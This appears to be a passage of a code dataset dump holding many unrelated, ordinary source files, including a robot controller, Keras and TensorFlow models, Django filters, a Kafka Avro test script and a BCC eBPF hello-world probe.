0\nfr_ObstacleCounter = 0\nturn_counter = 0\nturnR = True\nmove_counter = 0\nadjust = 0\n\nwhile robot.step(TIME_STEP) != -1:\n \n leftSpeed = 7\n rightSpeed = 7\n \n if adjust > 0:\n adjust -= 1\n leftSpeed = -3.4\n rightSpeed = 3.4\n \n elif f_ObstacleCounter > 0 and turnR:\n f_ObstacleCounter -= 1\n leftSpeed = 5.0\n rightSpeed = -5.0\n turn_counter += 1\n if turn_counter == 10:\n turnR = False\n turn_counter = 0\n \n elif f_ObstacleCounter > 0 and not turnR:\n f_ObstacleCounter -= 1\n leftSpeed = -5.0\n rightSpeed = 5.0\n turn_counter += 1\n if turn_counter == 10:\n turnR = True\n turn_counter = 0 \n\n elif fl_ObstacleCounter > 0:\n fl_ObstacleCounter -= 1\n leftSpeed = 5.0\n rightSpeed = -5.0\n \n elif fr_ObstacleCounter > 0:\n fr_ObstacleCounter -= 1\n leftSpeed = -5.0\n rightSpeed = 5.0\n \n else: # read sensors\n if ds[0].getValue() < 950.0:\n f_ObstacleCounter = 7\n elif ds[1].getValue() < 950.0:\n fl_ObstacleCounter = 7 \n elif ds[3].getValue() < 950.0:\n fr_ObstacleCounter = 7 \n else:\n move_counter += 1\n if move_counter == 50:\n adjust = 4\n move_counter = 0 \n \n wheels[0].setVelocity(leftSpeed)\n wheels[1].setVelocity(rightSpeed)\n \n# Enter here exit cleanup code.\n","sub_path":"controllers/our_controller/our_controller.py","file_name":"our_controller.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"530349620","text":"a = 1\n\n\ndef parent():\n # a = 5 #parent local\n\n def confusion():\n return sum # a\n\n return confusion()\n\n\nprint(parent())\nprint(a)\n\n# priority\n\n# 1 - start with local\n# 2 - parent local\n# 3 - Global\n# 4 - built-in python function\n\n#global\n\ntotal = 0\ndef count():\n global total\n total += 1\n return total\n\ncount()\ncount()\ncount()\nprint(count())","sub_path":"Basics/scope_rules.py","file_name":"scope_rules.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"366756412","text":"# -*- coding: UTF-8 -*-\nimport math\nimport pylab\nimport random\nfrom matplotlib import mlab\nL=100 # Число отчетов сигнала\nvh=[]# массив для входной последовательности сигнала с шумом\nvih=[]# массив для модуля выходной последовательности сигнала с шумом\ns=[]# массив для сигнала\nh=[]# массив для импульсной характеристики согл. фильтра\nvhmod=[]# массив для модуля входной последовательности сигнала с шумом\nfor i in range(0,L):\n if random.randint(0, 1)==1:\n s.append(complex(1,0))\n else:\n s.append(complex(-1,0))\nfor i in range(0,L):\n h.append(s[L-1-i].conjugate())\nfor i in range(0,500):\n x=complex(random.normalvariate(0, 0) ,random.normalvariate(0, 0))\n if i < 100 :\n x=x+s[i]\n vh.append(x);\n vhmod.append(abs(x));\nfor i in range(0,500):\n y=complex(0 ,0)\n for k in range(0,L) :\n if ((i-k)>=0 and (i-k).3 and distance !=np.inf:\n #print(distance)\n distance = self.lidar_data_ranges[0]\n self.pub.publish(Twist(linear=Vector3(x=distance)))\n #self.pub.publish(Twist(linear=Vector3(z=distance)))\n self.rate.sleep()\n #print('Stop')\n self.pub.publish(Twist(linear=Vector3(x=0)))\n self.rate.sleep()\n return self.identify_person\n\n def calc_heading(self):\n #Calculate angle between current and goal position Vectors\n self.pub.publish(Twist(angular=Vector3(z=0)))\n self.current_heading = euler_from_quaternion([self.current_position.orientation.x,self.current_position.orientation.y,self.current_position.orientation.z,self.current_position.orientation.w])\n globalCoords = self.neato_to_world()\n vector1 = np.array([math.tan(self.current_heading[2]),1])\n vector2 = np.array([self.strongestX -self.current_position.position.x,self.strongestY-self.current_position.position.y])#np.array([globalCoords[0][0] -self.current_position.position.x,globalCoords[1][0]-self.current_position.position.y])\n print(vector2.shape)\n angle = math.acos((np.dot(vector1,vector2))/(np.sqrt(vector1.dot(vector1))*np.sqrt(vector2.dot(vector2))))\n angle = angle\n \n if self.strongestX >0:\n angle = 1*angle\n print('Minus Pi')\n angle = angle - self.current_heading[2]\n print(\"Angle: \" + str(angle))\n\n return angle\n def neato_to_world(self):\n worldCoords = np.asarray([[-self.strongestX*np.cos(self.current_heading[2])],[-self.strongestX*np.sin(self.current_heading[2])],[0]]) +np.asarray([[self.strongestY*(-np.sin(self.current_heading[2]))],[self.strongestY*np.cos(self.current_heading[2])],[0]])+np.asarray([[self.current_position.position.x],[self.current_position.position.y],[1]])\n print('Heading: '+str(self.current_heading[2]))\n print('World: '+str(worldCoords))\n print('Local:' +str(self.current_position.position.x)+' '+str(self.current_position.position.y))\n return worldCoords\n def run(self):\n rospy.sleep(1)\n while not rospy.is_shutdown():\n self.state = self.state()\n\n\nif __name__ == '__main__':\n personFollower = personFollowerNode()\n personFollower.run()","sub_path":"warmup_project/scripts/person_follower.py","file_name":"person_follower.py","file_ext":"py","file_size_in_byte":7009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"296090556","text":"arv = int(input(\"Sisestage minutite arv: \"))\r\ncount = 0\r\npaarituid = 0\r\nlaike = 0\r\n\r\nwhile paarituid < arv:\r\n if (count % 2) is not 0:\r\n laike += count\r\n paarituid += 1\r\n count += 1\r\n\r\nprint(\"Laikide koguarv on \" + str(laike) + \".\")\r\n","sub_path":"Alused I/Nädal 3/3.4a Laikimine ver. 2.py","file_name":"3.4a Laikimine ver. 2.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"563292326","text":"# coding: utf-8\nfrom __future__ import unicode_literals\nimport os\nimport json\n\n\nclass MockResponse(object):\n def __init__(self, status, data=b'{}'):\n self.status_code = status\n self.content = data\n self.text = data.decode('utf-8')\n self.headers = {'Content-Type': 'application/vnd.uploadcare+json'}\n\n def json(self):\n \"\"\"Returns the json-encoded content of a response, if any.\"\"\"\n return json.loads(self.text)\n\n\nclass MockListResponse(MockResponse):\n def __init__(self):\n super(MockListResponse, self).__init__(\n 200, b'{'\n b'\"results\": [], \"next\": null, \"previous\": null,'\n b'\"total\": 0, \"per_page\": 1'\n b'}'\n )\n\n\ndef api_response_from_file(filename):\n path_to_tests_dir = os.path.dirname(__file__)\n path_to_file = os.path.join(path_to_tests_dir, 'api_responses', filename)\n\n with open(path_to_file, 'rb') as fp:\n return fp.read()\n","sub_path":"tests/functional/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"335111936","text":"from src.database import metadata\nfrom sqlalchemy import func, text\nfrom sqlalchemy.dialects.mysql import TINYINT, BIGINT\nfrom sqlalchemy import Table, Column, String, Text, TIMESTAMP, DATETIME\n\n\nreviews = Table('reviews', metadata,\n Column('id', BIGINT(20), primary_key=True, autoincrement=True),\n Column('external_id', String(255, collation='utf8mb4_unicode_ci'), unique=True, nullable=False),\n Column('author', String(255, collation='utf8mb4_unicode_ci'), nullable=False, index=True),\n Column('product_name', String(255, collation='utf8mb4_unicode_ci'), nullable=False),\n Column('review',Text(collation='utf8mb4_unicode_ci')),\n Column('rating', TINYINT(3, unsigned=True), nullable=False, index=True),\n Column('location', String(768, collation='utf8mb4_unicode_ci'), nullable=True),\n Column('purchase_date', DATETIME, nullable=True),\n Column('created_at', TIMESTAMP, nullable=False, server_default=func.now()),\n Column('updated_at', TIMESTAMP, nullable=False, server_default=text('CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP'), index=True)\n )\n\n\n\n\n","sub_path":"src/database/models/feefo_review.py","file_name":"feefo_review.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"131886661","text":"#! /usr/bin/python2.7\n\nimport sys\nprint(sys.version)\nimport sys\nimport pandas\nimport numpy as np\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.models import Sequential, load_model\nfrom keras.layers.core import Dense, Dropout\nfrom keras.optimizers import SGD, Adam\nfrom IPython.core.debugger import Tracer\nfrom keras.layers import Masking, LSTM, TimeDistributed, Bidirectional, Flatten\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping, ReduceLROnPlateau\nfrom sklearn.preprocessing import OneHotEncoder\n\n\n#FORMAT DATA\n#ONE HOT ENCODES A GIVEN COLUMN\ndef onehot(x): return np.array(OneHotEncoder().fit_transform(x.values.reshape(-1,1)).todense())\n\ndef format(data):\n del data['Unnamed: 605']\n mask = data['AgeGroup'] == 'ag1'\n column_name = 'AgeGroup'\n data.loc[mask, column_name] = 0\n mask = data['AgeGroup'] == 'ag2'\n column_name = 'AgeGroup'\n data.loc[mask, column_name] = 1\n mask = data['AgeGroup'] == 'ag3'\n column_name = 'AgeGroup'\n data.loc[mask, column_name] = 2\n mask = data['Gender'] == 'm'\n column_name = 'Gender'\n data.loc[mask, column_name] = 0\n mask = data['Gender'] == 'f'\n column_name = 'Gender'\n data.loc[mask, column_name] = 1\n return data\n\n\n#LOAD LABELS\ntrain_data_i_vectors = pandas.read_csv(\"/storage/tanel/child_age_gender/exp/ivectors_2048/train/export.csv\", sep=\" \")\ntrain_data_i_vectors = format(train_data_i_vectors)\ntrain_labels_age_group = onehot(train_data_i_vectors['AgeGroup'])\n\nval_data_i_vectors = pandas.read_csv(\"/storage/tanel/child_age_gender/exp/ivectors_2048/dev/export.csv\", sep=\" \")\nval_data_i_vectors = format(val_data_i_vectors)\nval_labels_age_group = onehot(val_data_i_vectors['AgeGroup'])\n\ntest_data_i_vectors = pandas.read_csv(\"/storage/tanel/child_age_gender/exp/ivectors_2048/test/export.csv\", sep=\" \")\ntest_data_i_vectors = format(test_data_i_vectors)\ntest_labels_age_group = onehot(test_data_i_vectors['AgeGroup'])\nprint (\"LABELS LOADED\")\n\n\n#LOAD DATA\n\ntrain_data_padded = np.load(\"/storage/hpc_lkpiel/data/fbank_train_data_padded.npy\", encoding=\"bytes\")\nval_data_padded = np.load(\"/storage/hpc_lkpiel/data/fbank_val_data_padded.npy\", encoding=\"bytes\")\ntest_data_padded = np.load(\"/storage/hpc_lkpiel/data/fbank_test_data_padded.npy\", encoding=\"bytes\")\nprint (\"DATA LOADED\")\n\n################################################################################################\n\nreduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.8,\n patience=2, min_lr=0.0001, verbose=1)\n\n\nmodel_6 = Sequential([\n Masking(mask_value=0., input_shape=(1107,20)),\n Bidirectional(LSTM(64, return_sequences=True, dropout=0.3)),\n Bidirectional(LSTM(64)),\n Dense(3, activation='softmax')\n])\n\nprint (\"model_6 BUILT\")\n\nmodel_6.compile(loss='categorical_crossentropy', optimizer=Adam(lr=0.001), metrics=['accuracy'])\nprint (\"model_6 COMPILED\")\n\n\ncheckpoint = ModelCheckpoint(filepath='/models/model_6.hdf5', monitor='val_loss', save_best_only=True)\n\nhistory = model_6.fit(x=train_data_padded,\n y=train_labels_age_group,\n validation_data=(val_data_padded, val_labels_age_group),\n epochs=25,\n verbose=1,\n batch_size=128,\n callbacks=[checkpoint, reduce_lr]\n)\n\nnp.save('../history/history_model_6.npy', history.history)\nmodelHistory = np.load('../history/history_model_6.npy').item()\n\nprint (\"HISTORY: \")\nprint (modelHistory)\nmodel_6.load_weights('/models/model_6.hdf5')\n\nvalResult = model_6.evaluate(val_data_padded, val_labels_age_group)\ntestResult = model_6.evaluate(test_data_padded, test_labels_age_group)\n\nfile = open(\"results.txt\",\"a\")\nfile.write(\"\\nmodel_6 VAL: \" + str(valResult) + \" TEST: \" + str(testResult))\nfile.close()\nprint (\"WROTE TO FILE\")\n\n\n########################################","sub_path":"rnn/rnn6.py","file_name":"rnn6.py","file_ext":"py","file_size_in_byte":3783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"233491714","text":"\"\"\".. Ignore pydocstyle D400.\n\n============\nFlow Filters\n============\n\n\"\"\"\nimport django_filters as filters\n\nfrom rest_framework.exceptions import ParseError\n\nfrom .models import Collection, Data, DescriptorSchema, Entity, Process, Relation\n\nNUMBER_LOOKUPS = [\n \"exact\",\n \"in\",\n \"gt\",\n \"gte\",\n \"lt\",\n \"lte\",\n \"isnull\",\n]\nTEXT_LOOKUPS = [\n \"exact\",\n \"iexact\",\n \"contains\",\n \"icontains\",\n \"in\",\n \"startswith\",\n \"istartswith\",\n \"endswith\",\n \"iendswith\",\n \"isnull\",\n]\nDATE_LOOKUPS = [\n \"exact\",\n \"gt\",\n \"gte\",\n \"lt\",\n \"lte\",\n \"year\",\n \"year__gt\",\n \"year__gte\",\n \"year__lt\",\n \"year__lte\",\n \"month\",\n \"month__gt\",\n \"month__gte\",\n \"month__lt\",\n \"month__lte\",\n \"day\",\n \"day__gt\",\n \"day__gte\",\n \"day__lt\",\n \"day__lte\",\n \"isnull\",\n]\nDATETIME_LOOKUPS = DATE_LOOKUPS + [\n \"date\",\n \"time\",\n \"hour\",\n \"hour__gt\",\n \"hour__gte\",\n \"hour__lt\",\n \"hour__lte\",\n \"minute\",\n \"minute__gt\",\n \"minute__gte\",\n \"minute__lt\",\n \"minute__lte\",\n \"second\",\n \"second__gt\",\n \"second__gte\",\n \"second__lt\",\n \"second__lte\",\n]\n\n\nclass CheckQueryParamsMixin:\n \"\"\"Custom query params validation.\"\"\"\n\n def get_always_allowed_arguments(self):\n \"\"\"Get always allowed query arguments.\"\"\"\n return (\n \"fields\",\n \"format\",\n \"limit\",\n \"offset\",\n \"ordering\",\n )\n\n def validate_query_params(self):\n \"\"\"Ensure no unsupported query params were used.\"\"\"\n allowed_params = set(self.get_filters().keys())\n allowed_params.update(self.get_always_allowed_arguments())\n\n unallowed = set(self.request.query_params.keys()) - allowed_params\n\n if unallowed:\n msg = \"Unsupported parameter(s): {}. Please use a combination of: {}.\".format(\n \", \".join(unallowed), \", \".join(allowed_params),\n )\n self.form.add_error(field=None, error=ParseError(msg))\n\n def is_valid(self):\n \"\"\"Validate filterset.\"\"\"\n self.validate_query_params()\n return super().is_valid()\n\n\nclass BaseResolweFilter(CheckQueryParamsMixin, filters.FilterSet):\n \"\"\"Base filter for Resolwe's endpoints.\"\"\"\n\n class Meta:\n \"\"\"Filter configuration.\"\"\"\n\n fields = {\n \"id\": NUMBER_LOOKUPS[:],\n \"slug\": TEXT_LOOKUPS[:],\n \"name\": TEXT_LOOKUPS[:],\n \"contributor\": [\"exact\", \"in\"],\n \"created\": DATETIME_LOOKUPS[:],\n \"modified\": DATETIME_LOOKUPS[:],\n }\n\n\nclass DescriptorSchemaFilter(BaseResolweFilter):\n \"\"\"Filter the DescriptorSchema endpoint.\"\"\"\n\n class Meta(BaseResolweFilter.Meta):\n \"\"\"Filter configuration.\"\"\"\n\n model = DescriptorSchema\n\n\nclass CollectionFilter(BaseResolweFilter):\n \"\"\"Filter the Collection endpoint.\"\"\"\n\n data = filters.ModelChoiceFilter(queryset=Data.objects.all())\n entity = filters.ModelChoiceFilter(queryset=Entity.objects.all())\n\n class Meta(BaseResolweFilter.Meta):\n \"\"\"Filter configuration.\"\"\"\n\n model = Collection\n fields = {\n **BaseResolweFilter.Meta.fields,\n **{\"description\": TEXT_LOOKUPS[:], \"descriptor_schema\": [\"exact\"],},\n }\n\n\nclass TagsFilter(filters.filters.BaseCSVFilter, filters.CharFilter):\n \"\"\"Filter for tags.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Construct tags filter.\"\"\"\n kwargs.setdefault(\"lookup_expr\", \"contains\")\n super().__init__(*args, **kwargs)\n\n\nclass EntityFilter(CollectionFilter):\n \"\"\"Filter the Entity endpoint.\"\"\"\n\n collection = filters.ModelChoiceFilter(\n field_name=\"collection\", queryset=Collection.objects.all()\n )\n tags = TagsFilter()\n\n class Meta(CollectionFilter.Meta):\n \"\"\"Filter configuration.\"\"\"\n\n model = Entity\n\n\nclass ProcessFilter(BaseResolweFilter):\n \"\"\"Filter the Process endpoint.\"\"\"\n\n category = filters.CharFilter(field_name=\"category\", lookup_expr=\"startswith\")\n type = filters.CharFilter(field_name=\"type\", lookup_expr=\"startswith\")\n is_active = filters.rest_framework.filters.BooleanFilter(field_name=\"is_active\")\n\n class Meta(BaseResolweFilter.Meta):\n \"\"\"Filter configuration.\"\"\"\n\n model = Process\n fields = {**BaseResolweFilter.Meta.fields, **{\"scheduling_class\": [\"exact\"],}}\n\n\nclass CharInFilter(filters.BaseInFilter, filters.CharFilter):\n \"\"\"Helper class for creation of CharFilter with \"in\" lookup.\"\"\"\n\n\nclass DataFilter(BaseResolweFilter):\n \"\"\"Filter the Data endpoint.\"\"\"\n\n collection = filters.ModelChoiceFilter(queryset=Collection.objects.all())\n collection__slug = filters.CharFilter(\n field_name=\"collection__slug\", lookup_expr=\"exact\"\n )\n\n entity = filters.ModelChoiceFilter(queryset=Entity.objects.all())\n\n type = filters.CharFilter(field_name=\"process__type\", lookup_expr=\"startswith\")\n status = filters.CharFilter(lookup_expr=\"iexact\")\n status__in = CharInFilter(field_name=\"status\", lookup_expr=\"in\")\n\n tags = TagsFilter()\n\n class Meta(BaseResolweFilter.Meta):\n \"\"\"Filter configuration.\"\"\"\n\n model = Data\n fields = {\n **BaseResolweFilter.Meta.fields,\n **{\n \"process\": [\"exact\"],\n \"process__slug\": [\"exact\"],\n \"finished\": DATETIME_LOOKUPS[:],\n \"started\": DATETIME_LOOKUPS[:],\n },\n }\n\n\nclass RelationFilter(BaseResolweFilter):\n \"\"\"Filter the Relation endpoint.\"\"\"\n\n category = filters.CharFilter(lookup_expr=\"iexact\")\n collection = filters.ModelChoiceFilter(queryset=Collection.objects.all())\n type = filters.CharFilter(field_name=\"type__name\")\n\n class Meta(BaseResolweFilter.Meta):\n \"\"\"Filter configuration.\"\"\"\n\n model = Relation\n fields = BaseResolweFilter.Meta.fields\n\n def get_always_allowed_arguments(self):\n \"\"\"Get always allowed query arguments.\"\"\"\n return super().get_always_allowed_arguments() + (\"entity\", \"label\", \"position\",)\n","sub_path":"resolwe/flow/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":6077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"139739265","text":"import sys\n\nfrom confluent_kafka import avro\nfrom confluent_kafka import KafkaError\n\nfrom confluent_kafka.avro import AvroProducer\nfrom confluent_kafka.avro import AvroConsumer\nfrom confluent_kafka.avro.serializer import SerializerError\n\n\nVALUE_SCHEMA_STR = \"\"\"\n{\n \"namespace\": \"Yggdrasil\",\n\t\"name\": \"Poem\",\n\t\"type\": \"record\",\n\t\"fields\": [\n\t\t{\"name\": \"name\", \"type\": \"string\"},\n\t\t{\"name\": \"text\", \"type\": \"string\"}\n\t]\n}\n\"\"\"\nVALUE_SCHEMA = avro.loads(VALUE_SCHEMA_STR)\n\nTEST_MESSAGES = [\n {\"name\": \"Völuspá\", \"text\": \"An ash I know there stands, Yggdrasill is its name, a tall tree, showered with shining loam. From there come the dews that drop in the valleys. It stands forever green over Urðr's well.\"},\n {\"name\": \"Hávamál\", \"text\": \"I know that I hung on a windy tree nine long nights, wounded with a spear, dedicated to Odin, myself to myself, on that tree of which no man knows from where its roots run\"},\n]\n\n\ndef produce_test_messages(broker, schema_registry, schema, topic):\n producer = AvroProducer(\n {\n 'bootstrap.servers': broker,\n 'schema.registry.url': schema_registry\n },\n default_value_schema=schema\n )\n\n for message in TEST_MESSAGES:\n producer.produce(topic=topic, value=message)\n print('Produced [%s]' % message)\n producer.flush()\n\n\ndef consume_test_messages(broker, schema_registry, topic):\n consumer = AvroConsumer({\n 'bootstrap.servers': broker,\n 'group.id': 'groupid',\n 'schema.registry.url': schema_registry,\n 'auto.offset.reset': 'earliest'\n })\n\n consumer.subscribe([topic])\n\n count = 0\n while True:\n try:\n msg = consumer.poll(1)\n\n except SerializerError as e:\n print(\"Message deserialization failed for {}: {}\".format(msg, e))\n break\n\n if msg is None:\n count += 1\n if count == 10:\n break\n continue\n\n if msg.error():\n print(\"AvroConsumer error: {}\".format(msg.error()))\n continue\n\n print('Consumed', msg.value())\n\n consumer.close()\n\n\nif __name__ == \"__main__\":\n\n if len(sys.argv) < 4:\n print(\"Usage: python3 producer.py \")\n exit(1)\n\n BROKER_HOST = sys.argv[1]\n SCHEMA_REGISTRY = sys.argv[2]\n TOPIC = sys.argv[3]\n\n produce_test_messages(BROKER_HOST, SCHEMA_REGISTRY, VALUE_SCHEMA, TOPIC)\n consume_test_messages(BROKER_HOST, SCHEMA_REGISTRY, TOPIC)\n","sub_path":"niu_heimar/test_yggdrasil.py","file_name":"test_yggdrasil.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"274737675","text":"import architecture\nimport tensorflow as tf\nimport Architectures.Layers.guidedfilter_color_trainable as gct\n\nclass MscnnGuidedColorTreinable(architecture.Architecture):\n def __init__(self):\n parameters_list = ['input_size', 'summary_writing_period',\n \"validation_period\", \"model_saving_period\"]\n\n self.config_dict = self.open_config(parameters_list)\n self.input_size = self.config_dict[\"input_size\"][0:2]\n\n def prediction(self, sample, training=False):\n \" Coarse-scale Network\"\n normalizer_params = {'is_training':training, 'center':True,\n 'updates_collections':None, 'scale':True}\n conv1 = tf.contrib.layers.conv2d(inputs=sample, num_outputs=5, kernel_size=[11, 11],\n stride=[1, 1], padding='SAME',\n normalizer_fn=tf.contrib.layers.batch_norm,\n normalizer_params=normalizer_params,\n activation_fn=tf.nn.relu)\n\n pool1 = tf.contrib.layers.max_pool2d(inputs=conv1, kernel_size=[2, 2], stride=2,\n padding='VALID') #pooling\n\n upsamp1 = tf.image.resize_nearest_neighbor(pool1, self.input_size) # upsampling\n\n\n conv2 = tf.contrib.layers.conv2d(inputs=upsamp1, num_outputs=5, kernel_size=[9, 9],\n stride=[1, 1], padding='SAME',\n normalizer_fn=tf.contrib.layers.batch_norm,\n normalizer_params=normalizer_params,\n activation_fn=tf.nn.relu)\n\n pool2 = tf.contrib.layers.max_pool2d(inputs=conv2, kernel_size=[2, 2], stride=2,\n padding='VALID') #pooling\n\n upsamp2 = tf.image.resize_nearest_neighbor(pool2, self.input_size) # upsampling\n\n conv3 = tf.contrib.layers.conv2d(inputs=upsamp2, num_outputs=10, kernel_size=[7, 7],\n stride=[1, 1], padding='SAME',\n normalizer_fn=tf.contrib.layers.batch_norm,\n normalizer_params=normalizer_params,\n activation_fn=tf.nn.relu)\n\n pool3 = tf.contrib.layers.max_pool2d(inputs=conv3, kernel_size=[2, 2], stride=2,\n padding='VALID') #pooling\n\n upsamp3 = tf.image.resize_nearest_neighbor(pool3, self.input_size) # upsampling\n\n linear_combination = tf.contrib.layers.conv2d(inputs=upsamp3, num_outputs=1,\n kernel_size=[1, 1],\n stride=[1, 1], padding='SAME',\n normalizer_fn=tf.contrib.layers.batch_norm,\n normalizer_params=normalizer_params,\n activation_fn=tf.nn.sigmoid)\n\n \"\"\"Fine-scale Network\"\"\"\n\n conv4 = tf.contrib.layers.conv2d(inputs=sample, num_outputs=4, kernel_size=[7, 7],\n stride=[1, 1], padding='SAME',\n normalizer_fn=tf.contrib.layers.batch_norm,\n normalizer_params=normalizer_params,\n activation_fn=tf.nn.relu)\n\n pool4 = tf.contrib.layers.max_pool2d(inputs=conv4, kernel_size=[2, 2], stride=2,\n padding='VALID') #pooling e upsampling\n\n upsamp4 = tf.image.resize_nearest_neighbor(pool4, self.input_size) # upsampling\n\n concatenation = tf.concat([upsamp4, linear_combination], 3)\n\n conv5 = tf.contrib.layers.conv2d(inputs=concatenation, num_outputs=5, kernel_size=[5, 5],\n stride=[1, 1], padding='SAME',\n normalizer_fn=tf.contrib.layers.batch_norm,\n normalizer_params=normalizer_params,\n activation_fn=tf.nn.relu)\n\n pool5 = tf.contrib.layers.max_pool2d(inputs=conv5, kernel_size=[2, 2], stride=2,\n padding='VALID') #pooling e upsampling\n\n upsamp5 = tf.image.resize_nearest_neighbor(pool5, self.input_size) # upsampling\n\n conv6 = tf.contrib.layers.conv2d(inputs=upsamp5, num_outputs=10, kernel_size=[3, 3],\n stride=[1, 1], padding='SAME',\n normalizer_fn=tf.contrib.layers.batch_norm,\n normalizer_params=normalizer_params,\n activation_fn=tf.nn.relu)\n\n pool6 = tf.contrib.layers.max_pool2d(inputs=conv6, kernel_size=[2, 2], stride=2,\n padding='VALID') # pooling e upsampling\n\n upsamp6 = tf.image.resize_nearest_neighbor(pool6, self.input_size) # upsampling\n\n linear_combination2 = tf.contrib.layers.conv2d(inputs=upsamp6, num_outputs=1,\n kernel_size=[1, 1], stride=[1, 1],\n padding='SAME',\n normalizer_fn=tf.contrib.layers.batch_norm,\n normalizer_params=normalizer_params,\n activation_fn=tf.nn.sigmoid)\n\n guided_trans = gct.guidedfilter_color_treinable(sample, linear_combination2, r=20, eps=10**-6)\n tf.summary.image(\"architecture_output\", guided_trans)\n return guided_trans\n\n\n\n def get_validation_period(self):\n return self.config_dict[\"validation_period\"]\n\n def get_model_saving_period(self):\n return self.config_dict[\"model_saving_period\"]\n\n def get_summary_writing_period(self):\n return self.config_dict[\"summary_writing_period\"]\n","sub_path":"Architectures/ProjectDeepdive/mscnn/mscnn_guided_color_treinable.py","file_name":"mscnn_guided_color_treinable.py","file_ext":"py","file_size_in_byte":6243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"564479476","text":"\"\"\"Returns an item list of the acceptable bank accounts.\nIf `organisation` is passed, then we only show bank accounts available for that\norganisation, using the following policy:\n - if organisation is independant accounting entity (ie. have accounting periods),\n only bank accounts from this organisation can be selected\n - otherwise, bank accounts from this organisation and all organisation directly\n members of the parent groups can be us\n - if organisation higher in the group hierarchy contains bank accounts, bank\n accounts from parent organisations can be selected\n\nIf organisation is not passed, this script will return all bank accounts\napplicable for section_category and section_category_strict_membership.\n\"\"\"\nportal = context.getPortalObject()\n\nsearch_kw = dict(portal_type=portal.getPortalPaymentNodeTypeList())\nif skip_invalidated_bank_accounts:\n search_kw['validation_state'] = '!=invalidated'\n\nif organisation:\n organisation_value = portal.restrictedTraverse(organisation)\n\n # if organisation is an independant accounting section and contains bank accounts,\n # only take into account those.\n if organisation_value == organisation_value.Organisation_getMappingRelatedOrganisation():\n bank_account_list = organisation_value.searchFolder(**search_kw)\n # else we lookup in organisations from parent groups.\n else:\n group_value = organisation_value.getGroupValue(None)\n if group_value is not None:\n uid_list = []\n while group_value.getPortalType() != 'Base Category':\n uid_list.append(group_value.getUid())\n group_value = group_value.getParentValue()\n search_kw['strict_parent_group_uid'] = uid_list\n search_kw['parent_portal_type'] = 'Organisation'\n bank_account_list = portal.portal_catalog(**search_kw)\n\nelse:\n if section_category is None:\n section_category = portal.portal_preferences\\\n .getPreferredAccountingTransactionSectionCategory()\n section_uid = portal.Base_getSectionUidListForSectionCategory(\n section_category=section_category,\n strict_membership=section_category_strict_membership)\n search_kw['parent_uid'] = section_uid\n bank_account_list = portal.portal_catalog(**search_kw)\n\n\nitem_list = [('', '')]\n\n\n# If we have bank accounts from more than one organisation, include\n# the organisation as hierarchy to show which organisation the bank\n# account belongs to.\ninclude_organisation_hierarchy = len(set(\n ['/'.join(b.path.split('/')[:-1]) for b in bank_account_list])) > 1\n\nprevious_organisation = None\n# sort bank accounts in a way that bank accounts from the same\n# organisation are consecutive\nfor brain in sorted(bank_account_list, key=lambda b:b.path):\n bank = brain.getObject()\n if include_organisation_hierarchy:\n organisation = bank.getParentValue()\n if organisation != previous_organisation:\n previous_organisation = organisation\n # include non-selectable element to show hierarchy\n item_list.append((organisation.getTranslatedTitle(), None))\n\n if bank.getReference() and bank.getTitle() \\\n and bank.getReference() != bank.getTitle():\n item_list.append(('%s - %s' % ( bank.getReference(),\n bank.getTitle() or\n bank.getSourceFreeText() or\n bank.getSourceTitle()),\n bank.getRelativeUrl()))\n else:\n item_list.append(( bank.getReference() or\n bank.getTitle() or\n bank.getSourceFreeText() or\n bank.getSourceTitle(),\n bank.getRelativeUrl() ))\n\nreturn item_list\n","sub_path":"bt5/erp5_accounting/SkinTemplateItem/portal_skins/erp5_accounting/AccountModule_getBankAccountItemList.py","file_name":"AccountModule_getBankAccountItemList.py","file_ext":"py","file_size_in_byte":3704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"275407964","text":"#!/usr/bin/env python3\n\nfrom bcc import BPF\n\nBPF_PROGRAM = r\"\"\"\nint hello(void *ctx) {\n bpf_trace_printk(\"Hello world! File opened\\n\");\n return 0;\n}\n\"\"\"\n\n\ndef main():\n bpf = BPF(text=BPF_PROGRAM)\n bpf.attach_kprobe(event=bpf.get_syscall_fnname(\"clone\"), fn_name=\"hello\")\n\n while True:\n try:\n (_, _, _, _, _, msg_b) = bpf.trace_fields()\n msg = msg_b.decode('utf8')\n if \"Hello world\" in msg:\n print(msg)\n except ValueError:\n continue\n except KeyboardInterrupt:\n break\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"002_hello_world.py","file_name":"002_hello_world.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"72992656","text":"import time\nimport pandas as pd\nimport numpy as np\n\nCITY_DATA = { 'chicago': 'chicago.csv',\n 'new york city': 'new_york_city.csv',\n 'washington': 'washington.csv' }\n\ndef get_filters():\n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n\n Returns:\n city - name of the city to analyze\n month - name of the month to filter by, or \"all\" to 